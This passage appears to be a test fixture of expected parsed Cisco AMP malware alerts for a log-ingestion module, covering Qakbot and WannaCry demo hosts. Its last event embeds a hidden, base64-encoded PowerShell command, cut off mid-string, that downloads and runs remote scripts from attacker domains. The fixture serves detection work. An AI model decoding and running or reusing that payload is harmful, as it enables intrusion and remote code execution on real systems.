"cisco.amp.detection_id": "6411525251028484105", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 698000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411525251028484000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 9463, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:59:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6411525251028484104", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 183000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411525251028484000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "6894b3834bd541fa85df79e44568acac", + "file.hash.sha1": "8cf0ca99a8f5019d8583133b9a9379299c45470c", + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "file.name": "MspthrdHash.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 12021, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "6894b3834bd541fa85df79e44568acac", + "8cf0ca99a8f5019d8583133b9a9379299c45470c" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419264043361501262", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 888000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264043361501000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 14506, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229331435814969", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 779000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264043361501000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 15718, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204905956802579", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 716000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264043361501000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 16930, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419264043361501261", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 888000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264043361501000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 18142, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229322845880359", + "cisco.amp.error.description": "Cannot delete", + "cisco.amp.error.error_code": 3221225761, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 718000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264039066534000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 24355, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419264039066533964", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 765000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264039066534000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 25559, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:35:01.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412622782676336648", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 729000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412622782676337000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 29323, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:35:01.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412622782676336647", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 729000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412622782676337000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 30524, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:35:01.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412622782676336646", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 713000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412622782676337000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 31725, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:35:01.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.D177E09A9A-95.SBX.TG", + "cisco.amp.detection_id": "6412622782676336645", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 198000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412622782676337000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "32c9e6737dbdcbfb7563a3f27e2b1571", + "file.hash.sha1": "f5a171c879b90e77861daf19741b373646d791ff", + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "120C.tmp", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\120C.tmp", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 35438, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "32c9e6737dbdcbfb7563a3f27e2b1571", + "f5a171c879b90e77861daf19741b373646d791ff" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:35:01.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.D177E09A9A-95.SBX.TG", + "cisco.amp.detection_id": "6412622782676336644", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 183000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412622782676337000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "2f99e3456dc1d26f77c52b2119fde92f", + "file.hash.sha1": "92673dd0e5f4a094fa6cd57bb301f884f2289f6c", + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "QuotaGroup.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 36775, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "2f99e3456dc1d26f77c52b2119fde92f", + "92673dd0e5f4a094fa6cd57bb301f884f2289f6c" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:14:44.000Z", + "cisco.amp.bp_data.audit": false, + "cisco.amp.bp_data.details.actions": [ + { + "action": "end_process", + "end_ts": 1602033881808, + "params": [ + "10724" + ], + "start_ts": 1602033881805, + "status": "success" + } + ], + "cisco.amp.bp_data.details.eng_epoch": 1, + "cisco.amp.bp_data.details.eng_ver": "0.9.0.104", + "cisco.amp.bp_data.details.matched_activity.events": [ + { + "process:start": { + "app": "powershell.exe", + "app_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", + "args": [ + "powershell.exe", + "-NoP", + "-NonI", + "-W", + "Hidden", + "-E", + "JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwA